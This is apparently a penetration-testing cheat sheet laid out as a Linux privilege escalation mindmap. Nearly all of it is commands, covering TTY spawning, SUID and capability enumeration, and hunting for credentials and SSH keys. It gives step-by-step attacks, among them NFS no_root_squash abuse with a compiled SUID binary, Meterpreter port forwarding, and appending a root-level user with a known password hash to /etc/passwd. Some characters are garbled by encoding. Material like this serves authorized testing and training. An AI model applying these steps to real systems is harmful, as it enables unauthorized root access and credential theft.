π¨S1REN's linux privesc
Linux Privilege Escalation Mindmap
1. Initial Shell Stabilization
-
Spawn proper TTY:
-
python -c 'import pty; pty.spawn("/bin/bash")' -
python3 -c 'import pty; pty.spawn("/bin/bash")'
-
-
Environment setup:
-
export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/tmp -
export TERM=xterm-256color -
alias ll='ls -lsaht --color=auto'
-
-
Background / foreground manipulation:
-
Ctrl + Zβ background process -
stty raw -echo ; fg ; reset
-
-
Terminal resize:
stty columns 200 rows 200
2. Capabilities / Tools Check
-
Compilers & interpreters:
-
which gcc -
which cc -
which python -
which perl
-
-
Download / transfer tools:
-
which wget -
which curl -
which fetch(BSD)
-
-
Networking / reverse shells:
-
which nc -
which ncat -
which nc.traditional -
which socat
-
3. System Information Gathering
-
Binary inspection:
file /bin/bash
-
Kernel info:
uname -a
-
Distribution / release info:
-
cat /etc/issue -
cat /etc/*-release
-
-
User privileges:
-
sudo -l -
ls -lsaht /etc/sudoers
-
-
User group memberships:
groups <user>
-
Environment variables:
env
-
Reference guides:
- Path variable exploitation: link
4. Filesystem Enumeration
-
Home directories:
cd /home/βls -lsaht
-
Web configuration files:
cd /var/www/html/βls -lsaht
-
SUID binaries:
find / -perm -u=s -type f 2>/dev/null
-
SGID binaries:
find / -perm -g=s -type f 2>/dev/null
-
SUID/SGID/SUDO escalation reference:
-
Binary/language capabilities:
-
getcap -r / 2>/dev/null -
Reference: getcap / setcap guide
-
-
Writable directories to βliveβ:
/var/tmp/,/tmp/,/dev/shm/
-
Exotic filesystem mounts / extended attributes:
cat /etc/fstab
5. Monitoring & Persistence
-
Monitoring cron / processes:
-
pspy32 / pspy64
-
Steps:
-
cd /var/tmp/ -
Transfer:
pspy32/pspy64 -
chmod 755 pspy* -
./pspy*
-
-
GitHub: pspy
-
-
Network inspection:
-
netstat -antup -
netstat -tunlp -
netstat -an -p tcp(For FreeBSD)
-
-
Processes running as root:
ps aux | grep -i 'root' --color=auto
6. Credential / Config Discovery
-
MySQL access (root, unauthorized):
-
mysql -uroot -p -
Default credentials tried:
root,toor, blank
-
-
/etc inspection:
-
cd /etc/βls -lsaht -
Config files:
ls -lsaht | grep -i '.conf' --color=auto -
Secret files:
ls -lsaht | grep -i '.secret' --color=auto
-
-
SSH keys:
ls -lsaR /home/
-
Other locations:
-
/var/lib/βls -lsaht -
/var/db/βls -lsaht -
/opt/βls -lsaht -
/tmp/βls -lsaht -
/var/tmp/βls -lsaht -
/dev/shm/βls -lsaht
-
7. File Transfer Capability
-
Tools check:
-
which wget,which curl,which nc,which fetch -
ls -lsaht /bin/ | grep -i 'ftp' --color=auto
-
-
NFS exploitation:
-
cat /etc/exportsβ check forno_root_squash -
Attacking machine:
-
mkdir -p /mnt/nfs/ -
mount -t nfs -o vers=<1,2,3> $IP:<share> /mnt/nfs/ -nolock -
Compile SUID:
gcc suid.c -o suid -
cp suid /mnt/nfs/ -
chmod u+s /mnt/nfs/suid -
su <user>β execute/mnt/nfs/suid
-
-
Target machine:
./suidβ root
-
8. Privilege Escalation Techniques
-
Exotic FS / extended attributes:
cat /etc/fstab -
GTFOBins / capabilities / SUID:
- Use GTFOBins for binaries with EP or empty capabilities
-
Forwarding weak services (Meterpreter example):
-
Check for vulnerable loopback services (e.g., Samba SMBD)
-
Port forwarding:
-
meterpreter> portfwd add βl 139 βp 139 βr <target> -
Background & exploit locally
-
-
-
Direct /etc/passwd modification (if writable):
-
openssl passwd -1 'i<3hacking'β$1$/UTMXpPC$Wrv6PM4eRHhB1/m1P.t9l. -
echo 'siren:<hash>:0:0:siren:/home/siren:/bin/bash' >> /etc/passwd -
su sirenβid
-
9. Cron Jobs / Scheduled Tasks
-
User cron:
crontab -u root -l -
System-wide cron:
-
cat /etc/crontab -
ls /etc/cron.*
-
-
Monitor suspicious scripts for privilege escalation
10. User / File Enumeration
-
Find files owned by user
bob:find / -user bob 2>/dev/null -
Mail files:
-
/var/mail/ -
/var/spool/mail/
-
11. Automation / Enumeration Tools
-
linPEAS: GitHub link
-
Traitor: GitHub link
-
GTFOBins: Website link
-
PSpy32 / PSpy64: GitHub link